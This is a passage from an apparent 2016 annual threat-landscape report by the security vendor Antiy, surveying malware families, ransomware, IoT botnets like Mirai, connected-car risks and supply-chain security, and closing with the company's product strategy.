Threat intelligence is a shared domain for both attackers and defenders. For example, C&C represent rules and clues for defenders, while for attackers they represent attack resources and traces. The purpose of tracing and attributing security incidents is to characterize the incident, implement targeted defense strategies, and trace attackers or organizations. The key elements used in tracing and attribution technologies are very concretely represented in threat intelligence. The sharing and implementation of threat intelligence provides strong support for more efficient and comprehensive incident tracing. The widespread availability of threat intelligence queries also provides attackers with an entry point to analyze their own exposure and to reverse-analyze defenders. Although threat intelligence providers can perform purposeful analysis on the query data and process, this reverse engineering approach is not yet mature and has not reached industry consensus. Threat intelligence providers cannot clearly distinguish whether there is overlap between their users and attackers. Failure to confine threat intelligence services to the client’s own assets may lead to new forms of targeted attacks.
4. PC Malware Targets Critical Infrastructure, Mobile Malware Is Growing Rapidly, And Ransomware Is Taking Center Stage
In 2016, Antiy captured 1,280 new traditional malware families and 912,279 new variants, covering hundreds of millions of sample hashes. The increase in traditional malware began to slow, while malware targeting mobile and emerging scenarios continued to rise. Meanwhile, the modularity and anti-analysis characteristics of malware samples in APT attacks were further enhanced. Regardless of whether it’s on PC or mobile devices, ransomware will remain a significant threat.
* Note: Since Antiy’s Basic Threat Annual Report and Mobile Threat Annual Report are published separately, the statistics in the Basic Threat Annual Report do not include malicious code for mobile systems.
4.1 The Proportion of Gray Areas Has Increased Further
In the 2016 ranking of the top ten malware families, Grayware and Riskware, which engage in advertising, occupied five spots, while the other five were all Trojan programs. Compared to last year’s TOP 10 list, there was one less Trojan program.
The top-ranked adware family is BrowseFox, a type of adware with legitimate data signatures that is bundled with free and shareware software. It can infiltrate computers whether the user is aware of it or not. BrowseFox infiltrates all browsers, including Internet Explorer, Google Chrome, and Mozilla Firefox, and then pops up various ads that mainly promote third-party products and services, and even modifies browser settings such as the homepage and default search engine. Finally, BrowseFox collects users’ online browsing history, search terms, and other information, and sends it back to a backend database. After data analysis, it is used to conduct more targeted promotional activities.
Second on the list is the risky software family DownloaderGuide, a professional downloader whose sole purpose is to download other programs to the host. The downloaded and installed programs are usually not detected by the user, and they often have invalid data signatures with names like “Freemium GmbH”.
The third most problematic software is the LMN family, which uses the BitTorrent protocol to download and install third-party programs locally. These programs may include the Amigo browser, the Unity Web Player browser plugin, and the Russian email client Mail.Ru. Some of these installers do not prompt the user when restarting the system and instead shut down and restart directly, which can affect the user’s normal use of the computer.
The fourth most common type of malware is the automatically named Trojan Agent.
The fifth most active malware family is IRCbot, which transmits or sends remote control commands through IRC communication channels. Its core behavior is to accept IRC remote control while uploading and downloading files, launching DDoS attacks, etc. It is an early malware family, but it was still very active in 2016.
The sixth most common type of malware is bundled Trojans written in VBS. Their main function is to download other malicious code to the system and run it. In 2016, the most downloaded malware, including VBS, JS, and PowerShell, was the infamous ransomware.
The seventh on the list is the Reconyc Trojan family, which is more like an adware program because its main functions are pop-up ads, browser redirection, and adding browser toolbars or plugins.
The eighth on the list is Dinwod, a Trojan horse program that has the ability to release or bundle malware. After infecting a user’s system, this family of malware will automatically release and install other malicious programs. Many easily detected and removed malware programs hide inside this type of Trojan horse to evade the detection of antivirus software and thus infect the user’s computer. Some variants of this family also have the ability to forcibly shut down antivirus software.
The ninth on the list is OutBrowse, a family of risky software that can download and install risky applications. After running a sample of this family, it downloads and installs an installer called “FLV Player”. After clicking to accept and start the download, an advertising page will pop up, consume system resources, and affect the user experience.
The tenth on the list is ICLoader, a gray software program that can download and install promotional applications. After running, this family of samples connects to the network to download and install promotional applications, consuming system resources and affecting the user’s normal use of the computer.
In the 2016 PC platform malicious code behavior ranking (Hash), advertising behavior aimed at profit once again ranked first. Download behavior, due to its covert and practical characteristics, still had a large number of occurrences. Network propagation behavior and risk tools ranked third and fourth respectively. Overflow behavior rose to fifth place. Although ransomware ranked twelfth in terms of the number of behaviors, the losses it caused were huge. Clearly, ransomware was the most noteworthy malicious behavior in 2016.
Figure 8 Ranking of Malware Behavior Categories on the PC Platform in 2016
4.2 Ransomware Has Evolved from a Form of Malicious Code into an Economic Model
Foreign researcher Danahy believes [16] The rise of ransomware is due to two factors: first, more and more criminals are finding this type of attack lucrative; and second, the ease of use and destructive power of ransomware tools, development kits, and services are constantly improving. Antiy researchers add that “the anonymity of Bitcoin payments and anonymous networks also contributes significantly to the covert nature of these crimes”. [17]
In 2016, multiple hospitals worldwide were attacked by the SamSam ransomware. After their electronic assets and patient information were encrypted, hospitals were extorted for millions of dollars in ransom, and patients’ health and lives were threatened to varying degrees. This was the first reported large-scale ransomware attack targeting enterprise clients in 2016. The ransomware used attack components comprised of JBoss vulnerabilities or other exploit packages to attack enterprise clients. After successfully compromising a terminal computer, it used that computer as a “pivot” to launch semi-automated attacks on the internal network, infecting as many other computers as possible, expanding the amount of encrypted electronic assets, and even encrypting backup assets. This was discussed in Antiy’s “2015 Review and Outlook on Cybersecurity Threats”. The viewpoints raised in [18] that “ransomware will become the most direct threat to individual users and even enterprise customers worldwide. In addition to encrypting user files and extorting Bitcoin, ransomware attackers are very likely to launch more targeted attacks to expand their gains, such as combining internal network penetration to threaten more important enterprise data and information” have been fully verified by the ransomware incidents that occurred in 2016.
Figure 9 From Worm-Based Infection Vectors to Ransomware Infection Vectors
Figure 10 Potential Entry Points for Ransomware to Attack
Antiy CERT created a diagram in 2004 illustrating the mainstream worms and their propagation entry points at the time (early diagram in Figure 9, left), which has been cited by many researchers. It is certain that although many of these methods have become ineffective under security enhancements such as DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization), problematic older systems still exist. The resurgence of worms driven by ransomware is inevitable, and issues such as distribution using existing botnets, propagation of vulnerabilities in emerging IoT scenarios, and the creation of harmful threats will become widespread. Furthermore, based on past incidents, those extorted include not only end users, but also manufacturers after large-scale user hijacking.
Ransomware has also brought new challenges to the cybersecurity of domestic government and enterprise networks. For a long time, some domestic government and enterprise organizations have focused their security efforts on easily detectable security incidents such as website tampering or DDoS attacks, while often neglecting internal network threats such as data theft and asset breaches. This is because these attacks are harder to detect, but ransomware targets endpoints, making the consequences readily apparent. Furthermore, relying solely on network interception is insufficient for such threats; it is essential to strengthen the last line of defense at endpoints and emphasize the effective return of endpoint defense. Antiy Intelligent Endpoint Protection System R&D team, based on their analysis and prediction of ransomware attacks and leveraging Antiy’s antivirus engine and proactive defense kernel, has improved multi-point defense: including whitelisting of document access processes, monitoring of bulk file tampering behavior, decoy files, and rapid file locking. Through these enhanced functions, Antiy can not only effectively detect and defend against current ransomware samples and destructive mechanisms but also prepare defenses against techniques that ransomware may use in the future. In addition to PC-based protection products, the Antiy Mobile Security Team (AVL TEAM) has conducted a lot of forward-looking research on anti-ransomware technology for the Android platform and applied it to the Antiy Mobile Antivirus Engine.
Money never sleeps. Driven by enormous economic interests, the spread and destructive methods of ransomware will become increasingly complex and difficult to prevent in the future. As the developers of Antiy IEP, we hope to help more users prevent such attacks.
5. IoT Threats Compromise the Security of National Critical Infrastructure, And Connected Vehicle Security Has Emerged as a Key Hotspot of Generalized Threats This Year
In 2013, we used the term “malware/other” to describe the evolution of security threats into new areas such as smart devices, and “generalization” has been an important threat trend that we have been paying attention to ever since.
Currently, the proliferation of security threats has become the norm, but we will still use the same approach as we did in our previous two annual reports on “the proliferation and distribution of cybersecurity threats” to illustrate the situation of threat proliferation in 2016 with a new chart.
5.1 IoT Threats Impact National Infrastructure Security
The Internet of Things (IoT) is a network of intelligent devices with sensing systems that do not require human intervention. In today’s society, IoT exists in every corner of social applications, such as wearable devices, connected vehicles, smart homes, smart cities, and Industry 4.0. When IoT poses a threat, it can affect the entire society regardless of location or industry.
The most impactful security incident of 2016 was undoubtedly the DDoS attack on Dyn, a DNS service provider on the US East Coast, which caused a network outage originating from IoT devices. Dyn confirmed on the morning of the incident that its DNS infrastructure on the US East Coast suffered a DDoS attack originating globally, severely impacting its DNS service customers’ businesses and even rendering their websites inaccessible. The attack lasted until approximately 1:45 PM local time. The services affected by the Dyn attack included Twitter, Etsy, GitHub, Soundcloud, Spotify, Heroku, PagerDuty, Shopify, and Intercom. It was also reported that PayPal, BBC, The Wall Street Journal, Xbox, CNN, HBO Now, Starbucks, The New York Times, The Verge, and the Financial Times were also affected. Dyn stated that the DDoS attack involved tens of millions of IP addresses, a large portion of which originated from IoT and smart devices, and believed the attack originated from malicious code called “Mirai”. Antiy published “IoT Botnets Seriously Threaten Network Infrastructure Security – Analysis and Reflection on the Mirai Trojan DDoS Attack on North American DNS Service Providers”[19], which provides an in-depth analysis of this incident.
At present, the scale of botnets relying on IoT devices is growing. Typical IoT DDoS botnet families include CCTV series, MM series (Chicken MM, number series 10771, 10991, 25000, 36000), BillGates, Mayday, PNScan, gafgyt and many other cross-platform DDoS botnet families based on Linux that appeared in 2013. Antiy’s standard naming of these Trojans is as follows.
Table 5 The Status of IoT Botnet Samples as of the Time of the Mirai Incident
| Family Name | Number of Variants | Number of Sample Hashes |
| Trojan[DDoS]/Linux.Mirai | 2 | Greater than 100 |
| Trojan[DDoS]/Linux.Xarcen | 5 | Greater than 1000 |
| Trojan[DDoS]/Linux.Znaich | 3 | Greater than 500 |
| Trojan/Linux.PNScan | 2 | Greater than 50 |
| Trojan[Backdoor]/Linux.Mayday | 11 | Greater than 1000 |
| Trojan[DDoS]/Linux.DnsAmp | 5 | Greater than 500 |
| Trojan[Backdoor]/Linux.Ganiw | 5 | Greater than 3000 |
| Trojan[Backdoor]/Linux.Dofloo | 5 | Greater than 2000 |
| Trojan[Backdoor]/Linux.Gafgyt | 28 | Greater than 8000 |
| Trojan[Backdoor]/Linux.Tsunami | 71 | Greater than 1000 |
| Worm/Linux.Moose | 1 | Greater than 10 |
| Worm[Net]/Linux.Darlloz | 3 | Greater than 10 |
Mirai, which garnered widespread attention in this incident, primarily targets IoT devices, including routers, webcams, and DVRs. As early as 2013, DDoS cybercrime organizations shifted their focus from Windows to Linux for botnet capture, expanding from x86-based Linux servers to IoT devices primarily running embedded Linux. Antiy captured and analyzed numerous malicious samples related to smart devices and routers, and cooperated with relevant authorities to conduct on-site evidence collection on some devices. These devices were mainly based on MIPS and ARM architectures, and due to factors such as default passwords, weak passwords, and unpatched critical vulnerabilities, they were vulnerable to malware implantation by attackers. Due to the large-scale mass production and deployment of IoT devices, the insufficient capabilities of integrators and maintenance personnel in many application scenarios have led to a significant proportion of devices using default passwords and vulnerabilities not being patched in a timely manner. This includes DDoS attacks targeting IoT devices, such as Mirai, which primarily use brute-force attacks on popular password patterns via Telnet ports or login with default passwords. If Telnet login is successful, the bot attempts to use embedded tools like BusyBox to download a DDoS-enabled bot via wget, modify its executable attributes, and run it to control IoT devices. Due to differences in CPU instruction architecture, after determining the system architecture, some botnets can choose to download samples based on architectures such as MIPS, ARM, and x86. After running, it receives relevant attack commands to launch attacks. Antiy, in its previous follow-up analysis of IoT botnets, discovered that some models of certain DVR, network camera, and smart router brands had a problem with a single default password.
Figure 11 Attack Mapping of Mirai’s Password-Cracking File Targeting Brand-Specific Default Passwords
IoT devices utilize a wide variety of network protocol technologies to enable information exchange between cyberspace and the physical world. However, IoT itself has the following security vulnerabilities: most IoT devices lack embedded security mechanisms and are mostly outside of traditional IT networks, meaning they are essentially outside the scope of security awareness and cannot respond effectively to problems; most IoT devices are online 24/7, making them a more “stable” attack source than desktop Windows; while Windows, as the mainstream desktop operating system, is constantly improving its memory security capabilities (such as DEP, ASLR, SEHOP), making it increasingly difficult to penetrate Windows through remote open ports, the success rate of remote injection into IoT devices, which generally lack rigorous security design, is much higher.
While DNS is indeed considered by many to be the Achilles’ heel of the internet, the IoT security issues exposed in this large-scale DDoS attack on Dyn’s DNS service deserve even greater attention. IoT botnets are far more than just tools in this attack; the compromised devices themselves possess far greater resource depth value, posing a more serious danger than using them in a DDoS attack. Their widespread vulnerability presents a more insidious and far more damaging risk to social and national security. It’s just that this risk is less easily perceived.
The Internet of Things (IoT) is essentially the internet connecting all things, a crucial foundational support for the future information society. It’s a network extending and expanding upon the internet. Beyond just a network, the IoT utilizes embedded sensors, devices, and systems based on sensing and information technologies to construct complex applications spanning the physical world. Many of these applications utilize critical infrastructure devices vital to people’s livelihoods, including even the foundational sensors for critical industrial control facilities. Therefore, security must be integrated into product design, rather than relying on methods like hardcoding default passwords into firmware or allowing easily bypassed web interfaces. Prioritizing ease of deployment while neglecting security will inevitably leave hidden security threats. The compromised devices themselves possess greater resource depth value, posing a more serious danger than using them for DDoS attacks. Therefore, both national and manufacturer perspectives should strengthen the security protection of IoT devices, increase the cost of attacking and infiltrating IoT devices, and enhance the monitoring and early warning of security threats to IoT devices.
5.2 The Security of the Vehicle Networking System and Intelligent Traffic Safety Will Become a Key Point of Contention
In 2016, connected car security began to receive extraordinary attention. A vulnerability was discovered in Volkswagen vehicles, allowing attackers to gain control of the vehicles through replay attacks on the wireless keys. Security researchers discovered that Jeep vehicles could be controlled via the OBDII interface. Domestic security teams such as Keen Team and 360 exposed vulnerabilities in Tesla and other vehicles at various geek events.
The automotive industry is a mainstay of the national economy. New energy vehicles, intelligentization, and connectivity are accelerating the industry’s development, spurring the application of technologies such as vehicle networking, autonomous driving, high-precision positioning, and big data, thus catalyzing the “Internet + Automobile” trend. The automotive industry’s development trends in intelligence and connectivity are also driving changes in the automotive electronics industry. From chip and in-vehicle electronic control system suppliers to vehicle infotainment system suppliers, and vehicle networking service providers such as TSPs, new players are entering the market while established players are exiting. The entire automotive electronics industry is entering a reshuffling phase.
Automobiles are a fundamental means of transportation in modern society. While attacks on mobile phones and computers primarily result in the loss of data in cyberspace, potentially impacting property security, attacks on automobiles can threaten personal health and life. Therefore, the automotive industry’s development trends towards intelligent and connected vehicles have raised industry-wide awareness of information security. The industry is shifting from complete disregard for information security to recognizing its importance to brands and future connected car services. In the future, with the government issuing relevant standards, continued exposure of automotive safety incidents, ongoing technological innovation by information security companies, and increasing safety awareness among car owners, the entire automotive industry will gradually establish and strengthen its security awareness.
Intelligent vehicles face complex risks of direct attack and supply chain security. Direct risks include:
Physical contact: Attacks are carried out through physical contact with the vehicle. The main attack mode is to attack the vehicle’s onboard system by inserting an OBD device into the vehicle.
Near-field communication hijacking: At close range to the vehicle, the attack mainly involves hijacking the corresponding near-field communication protocols such as NFC and Bluetooth to carry out replay attacks. A typical attack is to crack the wireless key and open the car door.
Remote control: This type of attack does not require physical contact or proximity to the vehicle. It achieves the theft of user information or even control of the vehicle by attacking one of the three links of “end-network-cloud”.
Therefore, the overall information security of automobiles inevitably involves “two ends and one cloud” (mobile/vehicle end + vehicle-to-everything (V2X) cloud services). From an attack surface perspective, this includes various security issues related to mobile terminals, vehicle-side infotainment systems, vehicle-side electronic control systems, V2X cloud services, and near-field and long-range communications. Consequently, the information security solutions involved are comprehensive, involving suppliers at various levels, such as in-vehicle security chips, in-vehicle firewalls, in-vehicle infotainment system security hardening, in-vehicle app threat detection and protection, in-vehicle system security OTA upgrades, communication encryption and authentication, mobile app threat detection and protection, and cloud security. Ultimately, in the automotive information security market, the future of V2X security will expand from simple vehicle security to the security of intelligent transportation systems and overall social security. An increasing number of APT attacks aim to impact social security; therefore, intelligent transportation security should be considered under high-intensity confrontation scenarios.
Antiy, currently relying on its solid foundation in threat detection and defense on the intelligent terminal side, is forming a protection system serving the V2X network with “detection + protection + service + perception”.
6. The Battle for Dominance in the Supply Chain Is About to Begin
As the scope of cybersecurity threats expands, supply chain security has become a hot security issue. This focus extends beyond the final supply chain to encompass all stages of its formation. It is noteworthy that attackers may exploit security vulnerabilities at various points in the supply chain, from upstream attacks and supply chain intrusions to underground supply chains, to conduct information gathering, pre-prepared attack payloads, and other pervasive attacks on their targets.
6.1 Emerging Devices and Scenarios Become New Entry Points for Attacks
From an IT system perspective, IT equipment, smartphones, smart devices, some product components, and software products are located at the upstream nodes of the supply chain. Compared to other nodes in the supply chain, they are difficult to verify as “black boxes” with specific functions. This allows attackers, driven by malicious intent, to exploit users without their knowledge. Some manufacturers can embed information collection modules, pre-install backdoors, or reserve debugging interfaces during the R&D phase, leaving attackers with exploitable pathways. Once a successful intrusion occurs, security incidents such as the leakage of important information will follow. These products can directly impact the physical world, resulting in incalculable losses. In addition, default passwords and hard-coded security features in hardware products also create security vulnerabilities.
The rapid development and application of smart devices are changing people’s lifestyles in terms of learning, work, and entertainment, but they also present numerous security risks. Besides the inherent security issues and incidents of smart devices themselves, these emerging devices and scenarios can become new entry points for attacks. Unlike traditional security systems, in addition to the inadequacies of the security systems inherent in these emerging devices and scenarios, security protection and early warning systems do not fully cover them. This provides attackers with new entry points, such as access to poorly regulated, physically isolated networks connected to these emerging devices.
6.2 The Code-Signing System Has Been Compromised
The code-signing system has long served as a core mechanism for ensuring the integrity and non-repudiation of the software supply chain. In the early days, most mainstream antivirus programs adopted a policy of automatically trusting programs with valid certificates. The issue of certificate theft began to attract widespread attention following APT incidents such as Stuxnet. In the 2015 Duqu 2.0 attack on Kaspersky [21], the malicious code misused a certificate belonging to Foxconn.
Figure 12 Time to Disclosure of Security Incidents Related to Digital Signatures and Certificates in Recent Years
However, malicious code with “legitimate” signatures is no longer the sole domain of APT attacks. Statistics from 2016 show that nearly one-fifth of Windows PE malware had digital signatures, and more than one-fifth of these digitally signed Windows PE malware possessed verifiable digital signatures. A large number of these certificates were not obtained through theft but rather through legitimate application processes.
Even more dangerous is that Android has consistently insisted on self-signing certificates and has never established a unified certificate authentication management mechanism. The Antiy Mobile Security Team (AVL TEAM) has detected multiple incidents of malicious code being signed using certificates from well-known vendors, raising the possibility that these vendors’ app signing certificates have been stolen. Furthermore, there have been instances among developers of syncing private key certificates to GitHub.
In people’s minds, certificate security is mostly at the algorithm level. For example, the impact of hash algorithm security on certificates is often discussed. However, as we have repeatedly pointed out, “without endpoint system security as a guarantee, encryption and authentication will become pseudo-security”. While the design of the cryptographic protocol for certificates is important, it is not enough to guarantee the security of the certificate system. Unfortunately, the existing code-based certificate system, represented by the Windows PE format, was established before endpoint data theft became mainstream. In this system, the security of the certificate issuance environment, the unified management and revocation mechanism of certificates, and the system security of the certificate authority itself have not received sufficient attention.
To date, Linux has failed to establish a universally applicable signature authentication system. Even some well-known open-source software on the Windows platform still doesn’t incorporate digital signature mechanisms in their binary releases. Undoubtedly, this presents further challenges to security defenses on Linux.
While a single code signing system is insufficient to guarantee supply chain security in an open environment, it remains a crucial cornerstone of supply chain security. Its more significant role lies in enabling publisher verification and traceability mechanisms. A world without a code signing system is destined to be a worse world.
6.3 Underground Supply Chains and Toolchains, As Well as Third-Party Sourcing Markets, Have Weakened Institutional Clients’ Defenses
While factors such as brand pre-installation and centralized procurement have improved the legality of operating systems and office software, the low security configurations of pirated operating systems, including pre-installed Trojans and malware, still threaten the security of institutional clients. Furthermore, many applications used by institutional clients still rely on online acquisition. Traditional download sites, localization sites, and driver sites commonly employ deceptive download methods, making it difficult for users to find the genuine download entry. Users often download so-called “download recommenders” and other advertising tools. These sites also frequently bundle and re-sign existing software drivers, embedding adware, downloaders, or other Trojans. These download tools and bundled adware generally possess information gathering and secondary download capabilities, creating uncontrolled software security entry points. This can lead to security breaches for institutional clients, and these channels can also be hijacked and exploited by advanced attackers.
6.4 The Internetization of Equipment and Applications Has Formed an Uncontrolled Information Channel Within the Institutional Network
Internet business models are based on user information and behavior, including the collection and aggregation of some privacy data, the value and convenience derived from big data analysis, and users exchanging some system control and personal information for convenient free services. While individual users have come to accept this information collection as an unavoidable norm, it also poses security challenges for institutional users. For example, document editing and note-taking tools connected to cloud storage may lead to the leakage of document content, and the cloud-based nature of input methods may result in the leakage of sensitive input information.
Simultaneously, the internetization of devices and applications expands the scope of enterprise protection, increases protection costs, and enhances the difficulty of internal security protection. Compared with traditional perimeter protection, the access of emerging devices has expanded the original protection boundary and formed an uncontrolled information channel. While emerging devices and application scenarios become new attack entry points, the internetization of these devices and applications constitutes an out-of-band information flow, bringing more possibilities for locating and profiling internal targets. These located targets and profiles make attackers’ targets more certain and precise. This internetization of devices and applications greatly increases the difficulty of internal security protection. Security issues at any link in the entire supply chain can have serious consequences if triggered. From the perspective of offense and defense between nations, the impact of supply chain security is evident in security incidents such as Stuxnet, Equation, and the Ukraine blackout. The overall complexity of the supply chain makes its overall structure difficult to discern clearly. Currently, countries around the world are concerned that superpowers may use their upstream advantages in the supply chain to transform them into unique operational capabilities serving their intelligence agencies, or even create upstream constraints on downstream entities. The gap between upstream and downstream in the supply chain not only creates technological and profit advantages for upstream businesses but also drives the convergence of information and resources. Defending against supply chain attacks requires establishing a clear architecture and standards system to encourage effective security considerations at each stage; strengthening security requirements for suppliers’ production and development; and promoting supply chain transparency. The core of supply chain transparency lies in effectively labeling supply chain links, clarifying technology sources, identifying and explaining associated risks, and understanding the risk flow of open-source exploits and third-party modules. Finally, strengthening cooperation with security vendors improves overall system security and threat awareness, extending supply chain security defenses not only to the current stage but also to earlier and later stages, maximizing security coverage.
In summaries of past cases, supply chain attacks have often been portrayed as a peripheral attack method used to infiltrate core IT environments—a frequent occurrence. However, if this is the only way to understand the issue, it’s turning a strategic problem into a tactical one. We have reason to believe that future cybersecurity confrontations will revolve around “supply chains” and “big data”. Supply chains have never been merely peripheral battlegrounds in cyber warfare; rather, they are the more core and lethal main battlefield.
7. Beliefs Shape Actions (Conclusion)
7.1 Seeking a Systematic Approach to Cybersecurity
In his speech on April 19, General Secretary Xi Jinping emphasized that “we must establish a correct understanding of cybersecurity. Principles determine actions”, and provided a profound interpretation of the fundamental principles governing cybersecurity. Once a correct understanding of cybersecurity has been established, it is crucial to identify effective methods and put them into practice. Progress in cybersecurity involves two aspects: on the one hand, continuously enhancing our capabilities through countering and analyzing threats; on the other hand, consistently discarding erroneous concepts and methods to achieve sustained progress.
How can we respect the holistic, dynamic, open, relative, and collaborative nature of cybersecurity while avoiding flawed security approaches that are fragmented, static, closed-off, absolute, and isolated? How can we implement the requirements for “round-the-clock, all-around awareness of the cybersecurity landscape” and “effective protection”, and how can we put into practice the “dynamic, comprehensive protection philosophy”? How can we achieve the goal of “advancing security and development in tandem”? The team at Antiy is constantly reflecting on, summarizing, and putting these ideas into practice.
Antiy has continuously advanced its “tower defense” approach to security incidents. The core idea of tower defense is to leverage the defender’s first-mover advantage in environmental deployment to form a defensive position. This involves deploying collaborative defense and awareness links at the boundary, traffic, and endpoints, and expanding the customer’s in-depth analytical capabilities. Antiy promotes effective system protection from the perspectives of vendors, customers, and adversaries, ultimately aiming to weaken, delay, and expose the adversary.
We are also actively seeking industry research findings and security methods that align with a correct cybersecurity perspective. Antiy’ public translation team co-translated “The Sliding Scale Model for Cybersecurity” in 2016 and actively shared it with the industry during winter training camps and other events. Related literature divides cybersecurity into five levels: architectural security, passive defense, active defense, threat intelligence, and offense. Except for offense, which is not applicable to general organizations, the other four levels form an organic whole. Cybersecurity planning is based on a fundamental security architecture and reliable passive defense measures, superimposed with effective active defense and threat intelligence measures. Without the foundational support of architectural security and passive defense, higher-level capabilities are difficult to effectively utilize; without the effective introduction of active defense and threat intelligence, basic measures alone cannot effectively combat deep threats. Each security level solves different problems and has different values. Lower-level security costs less but solves more fundamental and broader problems. From a cybersecurity investment perspective, the earlier the network is established, the more important it is to lay a solid foundation at the bottom layer; the higher the level of assets being protected, the more investment needs to be extended to active defense and threat intelligence. Therefore, as co-translator JOE of this article pointed out, cybersecurity innovation is more about incremental, cumulative innovation than iterative innovation. As the technologies and systems for proactive defense and threat intelligence continue to evolve and innovate, the security architecture and passive defense aspects themselves are also constantly developing and progressing. These ideas have opened up new avenues for Antiy to improve the effectiveness of its proactive defense and threat intelligence products, and have also provided a systematic perspective on how to understand the management and value of various technologies and products in the current cybersecurity landscape.
7.2 Our Annual Work
Over a year ago, Antiy held its third annual cybersecurity winter training camp, themed “Snowflakes Flying North”, and released a preliminary draft of its 2015 Basic Threat Report at the opening ceremony. At that time, we were already noticing the unchecked defensive capabilities resulting from supply chain attacks, the lowered barriers to advanced attacks due to commercial arms sales, the counter-use of threat intelligence through black market big data, and the emerging trend of combined online and offline attack methods. Once Pandora’s box is opened, the devil cannot be locked back up in a short time.
What particularly prompted our deep reflection was that advanced attackers commonly build simulated sandboxes to conduct simulated tests on various security products used by defenders. How can security products develop capabilities on the customer side that are difficult for attackers to predict? After continuous experimentation, reflection, and adversarial drills, Antiy determined to establish Antiy’s product DNA based on “next-generation threat detection engine, deep customer empowerment, and interactive visualization analysis”.
In 2016, Antiy released new versions of its endpoint protection product IEP, traffic monitoring product PTD, deep analysis product PTA, and threat intelligence product AVL Insight, thus improving and transforming its product line. Antiy also successfully established benchmark cases with high-security clients in the military, public security, customs, power, finance, and telecommunications sectors, and undertook the overall R&D work for multiple situational awareness and monitoring early warning platforms.
In 2012, during the early development of Antiy’s situational awareness system, the introduction of threat visualization enhanced the system’s performance, leading to the slogan “Making Security Visible”. In subsequent security practices, we focused on transforming security visualization from a purely display technology into an operational tool, enabling the correlation analysis of assets and threats at different points in time. We clarified that situational awareness is primarily a security business system built upon reliable basic perception and detection capabilities, in-depth analysis capabilities, top-level judgment capabilities, and operational processes. At the same time, we frequently face the question: what is the difference between situational awareness and traditional SIEM and SOC? SIEM and SOC are effective security practices that aggregate more discrete security elements into a whole. However, we need to recognize that SIEM and SOC emerged in an era when security products were operating in isolation. They emphasized the integration of existing security capabilities and the aggregation of logs, lacking a top-down approach to guiding the planning of more rational client-side and traffic-side capabilities according to a systematic security methodology and driven by top-level security business value. Antiy has accumulated comprehensive endpoint, network-side, and analytics capabilities, with detection and analysis capabilities spanning traditional PCs, mobile devices, and emerging scenarios. This facilitates our ability to design more granular sensing capabilities by working backward from the business needs of upper-level situational awareness.
From the traffic side, we pointed out at XDEF in 2013… [22] Traditional real-time network detection is mostly designed for combating threats such as worms and DDoS, based on the fact that payloads and behaviors are repeatedly reproduced. However, it does not adequately consider the highly targeted and one-time delivery of payloads in APT attacks. Traffic monitoring must form the ability to effectively capture and restore payloads and conduct linked analysis. In 2016, we did more work on the tracking of traffic detection devices to achieve forward tracing and backward conditional waiting based on deeply customized rules. This allows the device to switch between high-speed real-time detection and full-element collection detection modes. By expanding the records from five-tuples to thirteen-tuples, we achieved more effective tracing capabilities. At the same time, with the help of Antiy’s next-generation threat detection engine’s vector parsing capabilities, we upgraded the rule expansion capability of network monitoring from simple beacon expansion to vector-level rule expansion.
Regarding endpoint security, our new version of IEP product achieves deep detection of host operating elements and environmental context through comprehensive data collection of key host scenarios. Recognizing the overcorrection of a pure whitelist approach, we have adopted a dual-control reputation model, allowing different groups and targets to choose between a blacklist-centric or whitelist-centric security strategy based on their own risk level. Simultaneously, addressing the common phenomenon of having whitelists but lacking effective protection, we are further enhancing the protection points and deep data collection capabilities of proactive host defense. Based on relevant R&D progress, we will also resume updates to the anti-rootkit tool ATool and release a commercial forensic version.
When sandboxes are viewed as a kind of “detection engine”, we, as long-time explorers and practitioners of sandbox technology, believe this approach is biased. The detection results provided by sandboxes are divergent, and the value of this dynamic vector after decomposition and divergence is more important than the conclusion itself. Antiy insists on using the effective triggering of formatted document and browser vulnerabilities, the fine-grained disclosure of malicious behavior details, and the generation of threat intelligence as the main guiding principles of Antiy PTA analysis products, and insists on making the pre-deployed sandbox a private security capability for users.
In 2016, Antiy put its next-generation threat detection engine concept into practice, transforming the antivirus engine from a decision-maker into an analyzer with decision-making capabilities. The basic working principle of traditional antivirus engines is to skip non-virus formats, preprocess risky formats, and output the judgment results and threat names. Antiy’ next-generation threat detection engine, building upon these functions, adds mechanisms for full-format object recognition and deep analysis, thus providing a more granular decision-making space for upper-level human analysis, automated orchestration, and artificial intelligence.
As a key supply chain security vendor, Antiy is transforming from a provider that solves malware problems to one that takes on greater responsibility. Antiy AVL Inside not only provides mobile phone manufacturers with anti-malware capabilities but also integrates Wi-Fi security, payment security, and URL security. By penetrating the system’s underlying layers, it addresses the issue of equal access for secure applications and malicious programs. This comprehensive expansion of the supply chain extends Antiy’s threat awareness capabilities, enabling it to provide targeted analysis and threat intelligence to clients in high-security industries such as finance.
Based on reliable basic detection and analysis capabilities and supply chain awareness, Antiy has continuously improved the granularity of its situational awareness platform and its business imagination. In developing basic big data analysis capabilities, it avoids overwhelming events by using business processes to achieve overall judgment and decision-making, and conducts visualization work from an asset and reputation perspective, thus returning to the essence of asset value protection.
7.3 To Become a Capabilities-Driven Security Vendor with a Systematic Perspective
In 2016, vendors such as Antiy and 360 Enterprise Security repeatedly used the term “capability-based security vendor” in their analysis reports and conference presentations. Our understanding of capability-based security vendors is as follows:
“Having a firm belief in solving user security problems, having the conviction and courage to face security threats, and adhering to the ethics and values that security vendors should possess”.
Committed to independent research and development and technological innovation, the company possesses core technologies with unique technological value. It has its own distinctive characteristics and strengths in areas such as security threat perception, detection, defense, and analysis, as well as in perception systems, big data accumulation, and other key security technologies.
Relevant competency-based security vendors began advocating for mutual recognition of each other’s achievements this year. Although this agreement may seem straightforward, it is indeed the first step toward collaboration:
“In analysis reports, technical blogs, and morning news, we actively acknowledge and affirm each other’s achievements, clearly state each other’s work and contributions, and provide original links to each other’s technical achievements”.
For the analysis of major events, significant vulnerabilities, and critical systems, if one party has already done substantial work and in-depth analysis, then, adhering to the principles of active interaction and minimizing duplication and unnecessary effort, further in-depth analysis should be conducted based on the achievements of the collaborating party.
Promoting the effective integration of proactive defense, threat intelligence and architectural security, and passive defense, and striving to provide attackers with unpredictable security capabilities at points where attacks are difficult to bypass, to achieve highly automated and actionable security business value, will be the path Antiy chooses in the future.
We remain open, continuing to share our latest analytical reports and technical article compilations, and maintaining our commitment to sharing a weekly technical translation for public benefit, including our participation in the translation of the monumental work “Reverse Engineering for Beginners” this year. While these are minor tasks compared to Antiy’s current size and scale, our engineering culture and traditions will continue to be upheld. We not only look forward to more like-minded individuals joining Antiy’s ranks, but we also anticipate more capable security vendors in China joining us in the fight against threats.
